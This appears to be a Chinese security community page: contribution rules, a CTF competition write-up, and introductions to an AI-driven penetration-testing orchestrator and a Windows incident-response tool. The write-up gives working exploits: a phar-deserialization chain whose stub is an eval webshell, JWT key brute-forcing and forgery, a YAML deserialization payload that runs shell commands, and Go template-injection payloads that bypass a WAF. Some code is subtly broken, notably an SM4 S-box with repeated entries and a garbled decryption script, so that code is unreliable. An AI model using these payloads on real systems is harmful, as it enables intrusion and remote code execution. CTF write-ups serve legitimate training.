火线Zone是由火线安全平台打造的安全技术专家聚集和交流的社区，旨在推动数智时代的安全生态。

通过火线Zone内容社区、火线技术沙龙等形式，为技术专家提供最前沿的技术分享和交流。目前，火线Zone社区成员已超过20000人的规模，其中不乏来自腾讯、华为、Gitlab、绿盟、去哪儿等知名企业的CTO、CISO、安全VP、安全技术专家等，通过社群和活动讨论交流安全攻防、黑客溯源、企业安全管理、安全运营、软件应用安全、云计算安全等方向技术话题。

截止目前，火线Zone累计举办公开的技术交流活动27场(点击查看)、技术内容超过2000篇、10余个城市举办线下交流活动，全方位促进社区成员与企业之间的学习、交流与合作，为安全从业者提供全新思路，共同探讨行业未来发展之路。

在这里，我们重视每一位成员的声音！火线Zone现在诚挚邀请您加入我们的数智安全社区，分享自己经验，和大咖共探数智安全未来。

投稿须知

欢迎您向火线Zone投稿，分享您的知识和经验。为了确保您的稿件能够顺利通过审核并发表，请您仔细阅读以下投稿指南：
投稿文章内容方向包括并不仅限于以下方向：

1. 应用安全：当年最新的漏洞分析、安全预警及最新的测试技巧，并具备广泛影响性。
2. APP安全：针对APP、小程序的实战对抗、逆向分析、隐私合规等实战评估及测试方法论内容。
3. AIOT安全：针对可穿戴设备、安防设备、智能家居、汽车、工业设备等硬件设备的逆向分析、漏洞挖掘的实战评估和测试方法论内容
4. 黑客事件：针对DDOS、勒索病毒、APT攻击等实战黑客攻击的完整事件溯源分析以及威胁分析的方法论。
5. 红队攻防：针对中大型企业的真实攻防案例，具备防御机制绕过、内网横向、公有云横向等环节内容
6. 安全运营：针对基础安全、开发安全、办公网安全、安全托管运营等安全运营方向的实战落地内容
7. 其他：前沿领域安全研究，如大模型安全、AI应用安全等

希望你的文章质量满足以下要求：

1. 提供深入的分析和独到见解，揭示未公开的新内容。
2. 全面总结某一领域知识，可作为参考手册。
3. 确保内容已授权且完全脱敏，遵守法律法规，不涉及非法安全测试。
4. 文章篇幅需要符合深度分析的篇幅要求，具体篇幅长度视内容类型审核

审核流程说明：

1. 投稿后，若15天内未收到发表通知，您可自行决定是否向其他平台投稿。我们反对一稿多投，一经发现，将不予审核通过。
2. 火线Zone不提供稿件退回服务，请作者自行备份原稿。
3. 对于非原创、抄袭、洗稿或未遵守转载规则的稿件，我们将进行删除处理，并取消任何奖励，同时发布违规公告。

如何投稿

1. 在线投稿
   （注：为方便查看稿件审阅进度，请优先选择在线投稿方式）
   进入火线Zone[https://zone.huoxian.cn/]>点击左上方【发布主题】-> 在文章开头添加#应用安全#等文章类型标签。
   文章稿件支持Markdown格式，文章发布后，社区管理员将对其进行审核并进行精华优选，请耐心等待审核。
   没有火线Zone账户的用户，可前往火线Zone注册申请加入。
2. 邮件投稿
   您也可以将文章或稿件发送至zone@huoxian.cn
3. 稿件疑问
   欢迎添加火线安全小助手，投稿问题可随时咨询。
   

投稿奖励

1. 基础奖励：如果您未有火线安全平台认证邀请码，文章通过后你将获取到邀请码一枚，可以来注册成为火线白帽子参与平台漏洞悬赏项目。
2. 基础奖励：文章如审核通过即可获普通文章奖励（50查克拉积分），可用于兑换火线安全商城的礼品
3. 优秀奖励：文章内容符合社区征稿意向，内容充实有新意可获优秀文章奖励（50查克拉积分 + 500RMB）。
4. 精华奖励：最新的事件分析和安全预警，分享业内前沿最新技术、 0day 分析与利用、个人安全开发研究新成果 等方面的奇技淫巧、心经等可获加精文章奖励(（100查克拉 + 1000RMB）。
5. 精华奖励：发布文章并获取精华标签后，可以直接加入渗透测试、APP安全、IOT安全、威胁情报、红蓝对抗等相关领域核心众测群，参与平台私密众测项目。
6. 无奖励：内容深度较浅或网上有一定公开类似、单纯的工具介绍使用则不予奖励。

内容奖励要求：

1. 基础奖励在内容符合要求的前提下，阅读量不做要求
2. 优秀奖励在内容符合要求的前提下，阅读量当月突破500
3. 精华奖励在内容符合要求的前提下，阅读量当月突破1000（内容质量较高不受此条件限制）

奖励将在每月第一周公示并发放至火线安全平台账户，可在火线安全平台申请提现。
PS：文章通过后请联系“火线小助手”加入火线Zone创作者群，与其他创作者一起思想碰撞！

转载说明

为了维护原创作者的权益，确保内容的合法传播，特制定以下转载规则。在您希望转载火线Zone社区的文章时，请务必遵守以下指南：

1. 版权声明：在您的平台上转载文章时，请明确标注【原文来自火线Zone、原文作者以及原文链接】。
2. 转载声明：请在文章的显著位置注明以下声明：“本文经火线Zone授权发布，转载请联系火线Zone社区。”
3. 内容修改：您可以对文章标题和内容进行适度修改，以适应您的平台风格，但请确保不改变文章的核心观点和主旨。
4. 公众号转载：若您希望在微信公众号上转载，请先通过火线Zone社区的官方渠道申请授权。获得授权后，请在文章开头注明公众号信息，并在文末附上转载声明。
5. 责任归属：转载文章产生的任何版权纠纷，由转载方自行承担。请尊重知识产权，未经授权的转载行为将被视为侵权。
6. 独家代理：如果您是文章的原创作者，并且希望火线Zone作为您作品的独家代理，请在投稿时声明，并确保作品未在其他平台发布。
7. 版权保证：投稿者需保证拥有所投稿件的完整著作权，并授权火线Zone及其关联平台进行发布和传播。
   我们期待与您共同维护一个尊重原创、鼓励分享的社区环境。感谢您的理解和支持！

加入社群

火线Zone已经开启外部粉丝社区群和城市技术社群，大家可在群内进行技术交流，但严禁发表与技术无关的和讨论政治相关内容

添加“火线小助手”，并发送以下关键字加入社区
并发送“社区群”可以加入火线Zone社区技术群
发送“同城群”可以加入火线Zone城市分群

向WooYun Zone、Drops致敬

：）

前言

本来早都写好了，官方WP提交截止时间是昨晚九点半，懒得等了，今早发吧，整体题目还是比较有意思的。

Ez_readfile

php反序列化利用phar协议绕过waf写入webshell

析构函数中根据 $mode 值做不同操作：

• 'w': 把 $_POST[0] 写入一个随机 .phar 文件（可能用于 PHAR 反序列化）。
• 'r': include($_POST[0]) —— 文件包含漏洞

构造利用链

需要绕过正则，常用协议无法使用，这里使用glob协议

Nimbus` 被反序列化 → 析构时调用 `$this->handle()`
 → `$a->handle` 是 `Nimbus` 实例 → 调用 `Nimbus::__invoke()

根据利用连构造EXP如下

<?php
class Coral { public $pivot; }
class Nimbus { public $handle; public $ctor; }
class Zephyr { public $target; public $payload; }

@unlink("phar.phar");
$a = new Nimbus();
$a->handle = new Nimbus();
$a->handle->handle = new Zephyr();
$a->handle->handle->target = new Coral();
$a->handle->handle->target->pivot = new Nimbus();
$a->handle->handle->target->pivot->ctor = "DirectoryIterator";
$a->handle->handle->payload = "glob:///*fl*";
echo serialize($a);
$phar = new Phar("phar.phar");
$phar->startBuffering();
$phar->setStub("<?php eval(\$_GET[1]); phpinfo(); __HALT_COMPILER(); ?>");
$phar->setMetadata($a);
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();
?>

使用gz压缩绕过WAF

D:\phpstudy_pro\WWW>python 1.py
%1F%8B%08%00%1Em%BEh%02%FF%B3%B1/%C8%28PH-K%CC%D1P%89ww%0D%896%8C%D5%B4V%00%8Ae%E6%A5%E5k%00%99%F1%F1%1E%8E%3E%21%F1%CE%FE%BE%01%9E%3E%AEA%20%21%7B%3B%5E.%1DF%06%06%20b%10d%80%D0%0C%0C%DF%80%D8%DF%CA%CCJ%C9/37%A9%B4X%C9%CA%C8%AA%BA%18%C4%CFH%CCK%C9IU%B2%26%2C%19%95Z%90QY%84%90%2CI%2CJO-%01I%9AZ%299%E7%17%25%E6%28Y%19%82%E4%80%DC%82%CC%B2%FC%12%02%86%FAY%17%5B%99X%29%25%97%E4%17%29%01%99%86%E6VJ.%99E%A9%20~%A5gIjQ%22X%A2%B6%B6%D8%0A%28S%90X%99%93%9F%98%02Vhd%A5%94%9E%93%9Fd%A5%AF%AF%AF%95%96%A3%05T%83d%90%1F%3A%8F%03%E8%F3%92%D4%E2%12%BD%92%8A%12%16%20%5B4w_%06%88%E6%A9%AB%BF%B1%0D%128%60%F9%03%ADO%96%AB%CChk%BDz3%3F%5D%ADrJ%FE%91%DE%2B%C6L%409w%27_%27%00%3C%AA%2BO%88%01%00%00

POST上传文件，出发phar反序列化

读取文件

尝试写入webshell，进行命令执行，

可以查看当前目录，发现存在backup的定时文件，创建软连接到backup目录下读取flag文件。

EZ_python

考察点：JWT伪造爆破

​ yaml文件正则过waf文件上传进行命令执行

任意伪造jwt会报错密钥前缀，构造py爆破密钥

# brute_jwt.py
import jwt
import string
import itertools

# 你的 JWT
jwt_token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Imd1ZXN0Iiwicm9sZSI6InVzZXIifQ.karYCKLm5IhtINWMSZkSe1nYvrhyg5TgsrEm7VR1D0E"

# 密钥前缀（直接写 %）
secret_prefix = "@o70xO$0%#qR9#"

# 字符集
charset = string.ascii_letters + string.digits  # a-z, A-Z, 0-9

print("🚀 开始爆破密钥...")

for suffix in itertools.product(charset, repeat=2):
    secret = secret_prefix + ''.join(suffix)
    try:
        # 尝试解码
        decoded = jwt.decode(jwt_token, secret, algorithms=['HS256'])
        print(f"\n✅ 成功！密钥为：{secret}")
        print(f"Payload: {decoded}")
        break
    except jwt.InvalidTokenError:
        continue
else:
    print("❌ 未找到密钥")

获取到密钥构造admin权限的token进行文件上传

# sign_admin.py
import jwt

# 已知信息
secret = "@o70xO$0%#qR9#m0"  # 原始密钥（直接写 %）
old_jwt = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Imd1ZXN0Iiwicm9sZSI6InVzZXIifQ.karYCKLm5IhtINWMSZkSe1nYvrhyg5TgsrEm7VR1D0E"

# 新的 payload
new_payload = {
    "username": "admin",
    "role": "admin"
}

# 使用 HS256 算法重新签名
new_token = jwt.encode(new_payload, secret, algorithm='HS256')

print("✅ 成功生成 admin JWT：")
print(new_token)

获取到正确的token上传

文件上传的时候报错

只有内容为python的内容才能直接运行，回显为run，猜测后端代码使用method=python，前端依旧可以上传yaml文件，构造脚本常看回显，先使用ls -l查看当前路径下的文件，在读取f111ag

# send_yaml.py

import requests

url = "http://web-d4c6da270e.challenge.xctf.org.cn/sandbox"
headers = {
    "Authorization": "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicm9sZSI6ImFkbWluIn0.-Ws9e4GwaL0hesqjmSuOKNmyximBStder-7VnXK0w70"
}

# 上传 YAML 文件

files = {
    'codefile': ('exploit.yaml', '''
run: !!python/object/apply:subprocess.getoutput

  - cat /f1111ag*
    ''', 'text/yaml'),
    'mode': (None, 'yaml')  # 注意：mode 可能是 'yaml' 或 'yml'
    }

r = requests.post(url, files=files, headers=headers)
print("📡 状态码:", r.status_code)
print("📜 响应内容:")
print(r.text)

SilentMiner

攻击者IP auth.log下攻击者进行ssh爆破

192.168.145.131

攻击者共进行多少次ssh口令爆破失败?

实际上搜索出的是257次，实际上答案是258，我说咋一直不对，最后随手改的竟然提交对了，这个应该是答案错了

后门文件路径的绝对路径是什么?

sshd文件被修改并且重启了ssh服务

攻击者用户分发恶意文件的域名是什么？(注意系统时区)

/bar/log/dnsmasq.log中的dns域名进行检索，最终确定为

挖矿病毒所属的家族是什么？

通过恢复恢复tmp目录下文件进行解密找到加密的病毒家族kinsing

CheckWebshell

流量分析比较简单，语法搜索字符串找到flag.txt

返回包是内容，发现flag为sm4的国密算法求解得到flag

<?php
class SM4 {
    const ENCRYPT = 1;
    private $sk; 
    private static $FK = [0xA3B1BAC6, 0x56AA3350, 0x677D9197, 0xB27022DC];
    private static $CK = [
        0x00070E15, 0x1C232A31, 0x383F464D, 0x545B6269,
        0x70777E85, 0x8C939AA1, 0xA8AFB6BD, 0xC4CBD2D9,
        0xE0E7EEF5, 0xFC030A11, 0x181F262D, 0x343B4249,
        0x50575E65, 0x6C737A81, 0x888F969D, 0xA4ABB2B9,
        0xC0C7CED5, 0xDCE3EAF1, 0xF8FF060D, 0x141B2229,
        0x30373E45, 0x4C535A61, 0x686F767D, 0x848B9299,
        0xA0A7AEB5, 0xBCC3CAD1, 0xD8DFE6ED, 0xF4FB0209,
        0x10171E25, 0x2C333A41, 0x484F565D, 0x646B7279
    ];
    private static $SboxTable = [
        0xD6, 0x90, 0xE9, 0xFE, 0xCC, 0xE1, 0x3D, 0xB7, 0x16, 0xB6, 0x14, 0xC2, 0x28, 0xFB, 0x2C, 0x05,
        0x2B, 0x67, 0x9A, 0x76, 0x2A, 0xBE, 0x04, 0xC3, 0xAA, 0x44, 0x13, 0x26, 0x49, 0x86, 0x06, 0x99,
        0x9C, 0x42, 0x50, 0xF4, 0x91, 0xEF, 0x98, 0x7A, 0x33, 0x54, 0x0B, 0x43, 0xED, 0xCF, 0xAC, 0x62,
        0xE4, 0xB3, 0x1C, 0xA9, 0xC9, 0x08, 0xE8, 0x95, 0x80, 0xDF, 0x94, 0xFA, 0x75, 0x8F, 0x3F, 0xA6,
        0x47, 0x07, 0xA7, 0xFC, 0xF3, 0x73, 0x17, 0xBA, 0x83, 0x59, 0x3C, 0x19, 0xE6, 0x85, 0x4F, 0xA8,
        0x68, 0x6B, 0x81, 0xB2, 0x71, 0x64, 0xDA, 0x8B, 0xF8, 0xEB, 0x0F, 0x4B, 0x70, 0x56, 0x9D, 0x35,
        0x1E, 0x24, 0x0E, 0x5E, 0x63, 0x58, 0xD1, 0xA2, 0x25, 0x22, 0x7C, 0x3B, 0x01, 0x0D, 0x2D, 0xEC,
        0x84, 0x9B, 0x1E, 0x87, 0xE0, 0x3E, 0xB5, 0x66, 0x48, 0x02, 0x6C, 0xBB, 0xBB, 0x32, 0x83, 0x27,
        0x9E, 0x01, 0x8D, 0x53, 0x9B, 0x64, 0x7B, 0x6B, 0x6A, 0x6C, 0xEC, 0xBB, 0xC4, 0x94, 0x3B, 0x0C,
        0x76, 0xD2, 0x09, 0xAA, 0x16, 0x15, 0x3D, 0x2D, 0x0A, 0xFD, 0xE4, 0xB7, 0x37, 0x63, 0x28, 0xDD,
        0x7C, 0xEA, 0x97, 0x8C, 0x6D, 0xC7, 0xF2, 0x3E, 0x1A, 0x71, 0x1D, 0x29, 0xC5, 0x89, 0x6F, 0xB7,
        0x62, 0x0E, 0xAA, 0x18, 0xBE, 0x1B, 0xFC, 0x56, 0x36, 0x24, 0x07, 0x82, 0xFA, 0x54, 0x5B, 0x40,
        0x8F, 0xED, 0x1F, 0xDA, 0x93, 0x80, 0xF9, 0x61, 0x1C, 0x70, 0xC3, 0x85, 0x95, 0xA9, 0x79, 0x08,
        0x46, 0x29, 0x02, 0x3B, 0x4D, 0x83, 0x3A, 0x0A, 0x49, 0x06, 0x24, 0x1A, 0x47, 0x5C, 0x0D, 0xEA,
        0x9E, 0xCB, 0x55, 0x20, 0x15, 0x8A, 0x9A, 0xCB, 0x43, 0x0C, 0xF0, 0x0B, 0x40, 0x58, 0x00, 0x8F,
        0xEB, 0xBE, 0x3D, 0xC2, 0x9F, 0x51, 0xFA, 0x13, 0x3B, 0x0D, 0x90, 0x5B, 0x6E, 0x45, 0x59, 0x33
    ];

    public function __construct($key) {
        $this->setKey($key);
    }
    public function setKey($key) {
        if (strlen($key) != 16) {
            throw new Exception("SM4");
        }
        $key = $this->strToIntArray($key);
        $k = array_merge($key, [0, 0, 0, 0]);
        for ($i = 0; $i < 4; $i++) {
            $k[$i] ^= self::$FK[$i];
        }
        for ($i = 0; $i < 32; $i++) {
            $k[$i + 4] = $k[$i] ^ $this->CKF($k[$i + 1], $k[$i + 2], $k[$i + 3], self::$CK[$i]);
            $this->sk[$i] = $k[$i + 4];
        }
    }
    public function encrypt($plaintext) {
        $len = strlen($plaintext);
        $padding = 16 - ($len % 16);
        $plaintext .= str_repeat(chr($padding), $padding); 
        $ciphertext = '';
        for ($i = 0; $i < strlen($plaintext); $i += 16) {
            $block = substr($plaintext, $i, 16);
            $ciphertext .= $this->cryptBlock($block, self::ENCRYPT);
        }
        return $ciphertext;
    }
    private function cryptBlock($block, $mode) {
        $x = $this->strToIntArray($block);

        for ($i = 0; $i < 32; $i++) {
            $roundKey = $this->sk[$i];
            $x[4] = $x[0] ^ $this->F($x[1], $x[2], $x[3], $roundKey);
            array_shift($x);
        }
        $x = array_reverse($x);
        return $this->intArrayToStr($x);
    }
    private function F($x1, $x2, $x3, $rk) {
        return $this->T($x1 ^ $x2 ^ $x3 ^ $rk);
    }
    private function CKF($a, $b, $c, $ck) {
        return $a ^ $this->T($b ^ $c ^ $ck);
    }
    private function T($x) {
        return $this->L($this->S($x));
    }
    private function S($x) {
        $result = 0;
        for ($i = 0; $i < 4; $i++) {
            $byte = ($x >> (24 - $i * 8)) & 0xFF;
            $result |= self::$SboxTable[$byte] << (24 - $i * 8);
        }
        return $result;
    }
    private function L($x) {
        return $x ^ $this->rotl($x, 2) ^ $this->rotl($x, 10) ^ $this->rotl($x, 18) ^ $this->rotl($x, 24);
    }
    private function rotl($x, $n) {
        return (($x << $n) & 0xFFFFFFFF) | (($x >> (32 - $n)) & 0xFFFFFFFF);
    }
    private function strToIntArray($str) {
        $result = [];
        for ($i = 0; $i < 4; $i++) {
            $offset = $i * 4;
            $result[$i] =
                (ord($str[$offset]) << 24) |
                (ord($str[$offset + 1]) << 16) |
                (ord($str[$offset + 2]) << 8) |
                ord($str[$offset + 3]);
        }
        return $result;
    }
    private function intArrayToStr($array) {
        $str = '';
        foreach ($array as $int) {
            $str .= chr(($int >> 24) & 0xFF);
            $str .= chr(($int >> 16) & 0xFF);
            $str .= chr(($int >> 8) & 0xFF);
            $str .= chr($int & 0xFF);
        }
        return $str;
    }
}
try {
    $key = "a8a58b78f41eeb6a";
    $sm4 = new SM4($key);
    $plaintext = "flag";
    $ciphertext = $sm4->encrypt($plaintext);
    echo  base64_encode($ciphertext) ; //VCWBIdzfjm45EmYFWcqXX0VpQeZPeI6Qqyjsv31yuPTDC80lhFlaJY2R3TintdQu
} catch (Exception $e) {
    echo $e->getMessage() ;
}
?>

hardtest

Ai可以直接出，入口

关键函数是sub_13E1 以及常量 byte_2120

以及函数 sub_12A9、sub_1313、 sub_12DE 和常量 byte_2020

这些关键的给 AI 就直接出结果了

Minigame

考点： 微信小程序解包，map 文件解包，wasm 还原

是一个微信小程序用 wxapkg 解包 ，然后把解包得到的 chunk_0.appservice.js.map 再次解包

可以发现核心在 utils/validator.js 中 ，在 util 目录发现了 validator.wasm ，然后通过工具 wasm-decompile

export memory a(initial: 258, max: 258); 
data d_a(offset: 1024) = 
 "\ff\f5\f8\fe\e2\ff\f8\fc\a9\fb\ab\ae\fa\ad\ac\a8\fa\ae\ab\a1\a1\af\ae\f8" 
 "\ac\af\ae\fc\a1\fa\a8\fb\fb\ad\fc\ac\aa\e4"; 
export function c(a:ubyte_ptr):int { // func0 
 var e:int; 
 var b:int_ptr; 
 var d:int; 
 var c:ubyte_ptr; 
 if ({ 
 d = a; 
 if (eqz(d & 3)) goto B_c; 
 0; 
 if (eqz(a[0])) goto B_a; 
 loop L_d { 
 a = a + 1; 
 if (eqz(a & 3)) goto B_c; 
 if (a[0]) continue L_d; 
 } 
 goto B_b; 
 label B_c: 
 loop L_e { 
 b = a; 
 a = b + 4; 
 if ( 
 ((16843008 - (e = b[0]) | e) & -2139062144) == -2139062144) continue L_e; 
 } 
 loop L_f { 
 a = b; 
 b = a + 1; 
 if (a[0]) continue L_f; 
 } 
 label B_b: 
 a - d; 
 label B_a: 
 } != 
 38) { 
 return 0 
 } 
 loop L_h { 
 a = c[1024] ^ (c + d)[0]:byte; 
 b = a == 153; 
 if (a != 153) goto B_i; 
 c = c + 1; 
 if (c != 38) continue L_h; 
 label B_i: 
 } 
 return b; 
} 
export function b() { // func1 
}

把这两个代码给AI就可以直接得到 flag

Newtrick

考点：对称加密算法和离散对数问题

由于有根据源码直接推出解密脚本

from hashlib import md5 
from Crypto.Cipher import AES 
p = 
115792089237316195423570985008687907853269984665640564039457584007913129639
747 
F = GF(p) 
Q = (123456789, 987654321, 135792468, 864297531) 
N_Q = F(sum(x * x for x in Q)) 
R = ( 
 
535805042719399545796962826381600584293083019277531395431476058825743363271
45, 
799913182452098376229457194675627969511376052122949799764791997934539620908
91, 
531268698891810405870372104622761160960325946775601453062691481560347571601
28, 
973680242303063998595227832922465096998302542946496684346049712134964678571
55 
) 
N_R = F(sum(x * x for x in R)) 
try: 
 secret = discrete_log(N_R, N_Q, bounds=(0, 2^50)) 
 print("[+] Secret found:", secret) 
except Exception as e: 
 print("[-] discrete_log failed:", e) 
 
 secret = 895942422329 
key = md5(str(secret).encode()).digest() 
cipher = AES.new(key, AES.MODE_ECB) 
try: 
 flag = cipher.decrypt(encrypted_flag) 
 print("[+] Flag:", flag) 
except Exception as e: 
 print("[-] failed:", _e)

SSTi模板注入，golang的SSTI，执行

{{.}}

回显

map[B64Decode:0x6ee380 exec:0x6ee120]

直接执行

{{exec "id"}}

能够执行id，但是其余的其它命令基本都无法执行，猜测后端代码WAF拦截直接输出原字符串，尝试绕过WAF

{{B64Decode "aGVsbG8="}}

可以成功回显hello，直接使用B64Decode绕过，构造payload读取flag

{{B64Decode "Y2F0IC9mbGFn" | exec}}

CyberStrikeAI：让安全测试像对话一样简单——智能渗透测试的技术实践

先附上开源工具链接：

https://github.com/Ed1s0nZ/CyberStrikeAI

从工具堆砌到智能调度：渗透测试的演进之路

作为安全工程师，我们都经历过这样的场景：面对一个新的目标系统，我们需要在数十个安全工具之间不断切换，记忆各种复杂的命令行参数，手动分析海量的扫描结果，然后在不同的工具输出中寻找关联性。这种工作方式不仅效率低下，更严重的是，我们往往在工具的使用上花费了太多精力，反而减少了对安全威胁本质的思考时间。

技术人的解决方案：CyberStrikeAI的设计理念

CyberStrikeAI不是要取代安全工程师，而是要成为工程师的智能助手。基于一个朴素但强大的想法：用技术手段解决技术问题，让AI处理重复性工作，让人专注于创造性分析。

效果

对话效果

MCP调用

调用链

核心架构：Golang + MCP协议的工程化实现

// 核心架构简示
Agent Loop (AI决策引擎)
    ↓
MCP Server (工具调度中心)  
    ↓
Security Executor (命令执行层)
    ↓
98+ Security Tools (工具生态)

技术栈选择背后的思考：

• Golang：并发性能优异，跨平台编译方便，部署简单
• MCP协议：标准化工具调用，确保扩展性和兼容性
• SQLite：轻量级数据存储，适合单机部署场景

实际工作流程对比

传统方式：

# 1. 端口扫描
nmap -sS -sV -O 192.168.1.0/24

# 2. Web服务识别
httpx -l targets.txt -title -status-code

# 3. 漏洞扫描  
nuclei -l targets.txt -t /nuclei-templates/

# 4. 手动分析结果，决定下一步...

CyberStrikeAI方式：

"对192.168.1.0/24网段进行全面的安全评估，重点关注Web服务漏洞"

系统自动完成：

1. 识别网络范围，调用nmap进行主机发现
2. 对发现的Web服务调用httpx进行指纹识别
3. 基于服务指纹选择相应的漏洞检测模板
4. 自动分析结果，对可疑目标进行深度扫描
5. 生成结构化报告，包括漏洞详情和修复建议

面向安全工程师的技术特性

工具集成：不重复造轮子

我集成了98+个经过社区验证的安全工具，包括：

• 信息收集：nmap, subfinder, amass, theharvester
• 漏洞扫描：nuclei, sqlmap, xsser, dalfox
• Web安全：dirb, gobuster, nikto, wafw00f
• 专项工具：wpscan, jexboss, ysoserial

每个工具都通过YAML配置文件进行标准化封装：

name: "nmap"
command: "nmap"
args: ["-sT", "-sV", "-sC"]
description: "网络扫描工具，用于发现网络主机、开放端口和服务"

parameters:
  - name: "target"
    type: "string"
    description: "目标IP地址或域名"
    required: true

智能决策：AI作为调度器

AI在系统中的角色不是替代工具，而是智能调度器和结果分析器：

// AI决策流程
1. 理解用户自然语言请求
2. 分析目标特征和测试需求  
3. 选择最适合的工具组合
4. 动态调整参数优化扫描效果
5. 解析工具输出，提取关键信息
6. 基于发现决定后续测试路径

实时监控：掌握测试全过程

系统提供完整的执行监控：

# 查看工具执行状态
GET /api/monitor

# 实时查看漏洞统计
{
  "total": 23,
  "severityCount": {
    "critical": 2,
    "high": 5, 
    "medium": 10,
    "low": 6
  }
}

实际应用场景分析

场景一：红队渗透测试

需求：快速对目标企业进行外围渗透测试
传统方式：手动信息收集 → 工具链执行 → 结果整理 (耗时：4-6小时)
CyberStrikeAI：单次对话描述测试目标 → 自动执行完整流程 (耗时：30-60分钟)

场景二：漏洞复现与验证

需求：批量验证SRC提交的漏洞
传统方式：逐个手动测试，重复性工作量大
CyberStrikeAI：批量导入目标 → 自动匹配检测方案 → 生成验证报告

场景三：安全巡检

需求：定期对资产进行安全巡检
传统方式：编写脚本，定时执行，人工分析
CyberStrikeAI：配置巡检策略 → 自动执行 → 差异对比 → 告警通知

扩展性与二次开发

自定义工具集成

通过标准的YAML配置即可集成新工具：

name: "custom-scanner"
command: "python3"
args: ["/tools/myscanner.py"]
parameters:
  - name: "target"
    type: "string"
    required: true

API集成现有流程

系统提供完整的REST API，可轻松集成到现有安全体系中：

# 集成到自动化漏洞管理平台
def trigger_scan(target, scan_type):
    response = requests.post(
        'http://cyberstrike-ai:8080/api/agent-loop',
        json={'message': f'{scan_type}扫描 {target}'}
    )
    return process_results(response.json())

技术人的实践建议

部署方案

• 开发测试：本地Docker部署，快速验证
• 团队使用：服务器部署，共享使用
• 集成环境：API方式集成到现有安全平台

使用技巧

1. 渐进式测试：从基础扫描开始，逐步深入
2. 结果验证：AI发现的关键漏洞建议人工复核
3. 工具补充：根据实际需求扩展工具库

结语：技术赋能，专注价值

CyberStrikeAI的本质是通过技术手段提升安全工程师的工作效率，让我们从繁琐的工具操作中解放出来，更加专注于威胁分析、漏洞研究和防护策略等更有价值的工作。

在网络安全人才紧缺的今天，提升个体工程师的效率就是提升整个行业的安全水位。我相信，好的工具应该像得力的助手一样，默默处理繁琐工作，让专家专注于专业判断。

项目地址：https://github.com/Ed1s0nZ/CyberStrikeAI

让技术回归本质，让安全测试变得更加高效——这是CyberStrikeAI的技术追求，也是我对安全社区的诚意贡献。

前言

将近三周的时间开发，目标是针对小白都能上手的Windows应急工具，完全基于红队人员攻击思路以及蓝队应急流程开发的Windows应急响应工具，目前V2.0的版本基本上已经ok了没有问题，下面是工具介绍，目前网上基本上没有比这个更好用且更完善的工具，计划是在V3.0计划兼容Winserver2008以下版本，另外加入内存马查杀机制。因为初衷就是想轻量，如果工具过大就违背了这个工具的初衷。

工具授权

目前工具设置需要授权码，计划是三月一次授权。

Cr7crwBXfh2AHVMh/RmH7w==

项目地址

https://github.com/Am1azi3ng/WinTracePro

系统支持

• Windows 10/11 ✅
• Windows Server 2012/2016/2019/2022 ✅
• Windows Server 2008 R2 ✅
• Windows Server 2008 非 R2 ⚠️ 仅支持 Get-EventLog，需升级 PowerShell

工具核心日志处理

// 后门用户迁移4732时间id日志提取
func FetchAndStoreBackdoorUsers(db *sql.DB, startTime, endTime string) error {
	// 动态构建 PowerShell 命令，使用传入的开始和结束时间
	psCmd := fmt.Sprintf(`[Console]::OutputEncoding = [System.Text.Encoding]::UTF8;
$startTime = '%s';
$endTime = '%s';
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4732; StartTime=$startTime; EndTime=$endTime} -MaxEvents 200 |
ForEach-Object {
    $xml = [xml]$_.ToXml()

    $subjectSid = $xml.Event.EventData.Data | Where-Object { $_.Name -eq "SubjectUserSid" } | Select-Object -ExpandProperty '#text'
    $memberSid = $xml.Event.EventData.Data | Where-Object { $_.Name -eq "MemberSid" } | Select-Object -ExpandProperty '#text'
    $groupSid = $xml.Event.EventData.Data | Where-Object { $_.Name -eq "TargetSid" } | Select-Object -ExpandProperty '#text'

    function Get-NameFromSid($sid) {
        try {
            return (New-Object System.Security.Principal.SecurityIdentifier($sid)).Translate([System.Security.Principal.NTAccount]).Value
        } catch {
            return $sid
        }
    }

    $subjectName = Get-NameFromSid $subjectSid
    $memberName = Get-NameFromSid $memberSid
    $groupName = Get-NameFromSid $groupSid

    "$($_.TimeCreated)###$($_.Id)###$subjectName###$memberName###$groupName"
}`, startTime, endTime)

	// 调用 runPowerShellCommand，它会返回一个包含输出行的切片和错误信息
	lines, err := runPowerShellCommand(psCmd)

	// --- 错误处理部分 ---
	// 如果 PowerShell 命令执行失败
	if err != nil {
		// 检查错误信息是否包含“No events were found”
		if strings.Contains(err.Error(), "No events were found") {
			// 如果是这个特定错误，返回自定义的友好错误信息
			return fmt.Errorf("无用户组迁移相关事件id4732")
		}
		// 如果是其他错误，则返回原始错误
		return fmt.Errorf("执行PowerShell命令失败: %w", err)
	}

	// 如果没有错误，但返回的行切片是空的，也视为没有找到事件
	if len(lines) == 0 {
		return fmt.Errorf("无用户组迁移相关事件id4732")
	}
	// --- 错误处理部分结束 ---

	tx, err := db.Begin()
	if err != nil {
		return err
	}
	defer func() {
		if err != nil {
			tx.Rollback()
		}
	}()

	// 清理旧数据
	_, err = tx.Exec(`DELETE FROM backdoor_users`)
	if err != nil {
		return err
	}

	stmt, err := tx.Prepare(`INSERT INTO backdoor_users (time_created, event_id, subject_name, member_name, group_name) VALUES (?, ?, ?, ?, ?)`)
	if err != nil {
		return err
	}
	defer stmt.Close()

	for _, line := range lines {
		if len(strings.TrimSpace(line)) == 0 {
			continue
		}
		parts := strings.SplitN(line, "###", 5)
		if len(parts) < 5 {
			continue
		}

		_, err = stmt.Exec(parts[0], parseInt(parts[1]), parts[2], parts[3], parts[4])
		if err != nil {
			return fmt.Errorf("插入后门用户日志失败: %w", err)
		}
	}

	return tx.Commit()
}

基本上所有的日志模块的处理都是基于powershell来实现的，所以在winserver 2008及以下的版本不安装工具是无法使用的

日志检索效率以及优势

因为该工具是日志文件数据提取保存，会从db文件中读取已经保存的部分数据，在检索速度上效果还是可以的，最大的优势是直接根据事件详情提取需要的字段，避免从Windows自带的检索功能中逐条查看，效率大大提高。

主机信息模块

• 获取主机信息和网卡信息
• 获取网络连接状态
• 网络外联IP定位，目前调用的是公网的ip.net的接口

日志分析模块

• 提取 Windows 应用日志（Application Log）
• 提取 Windows 安全日志（Security Log）
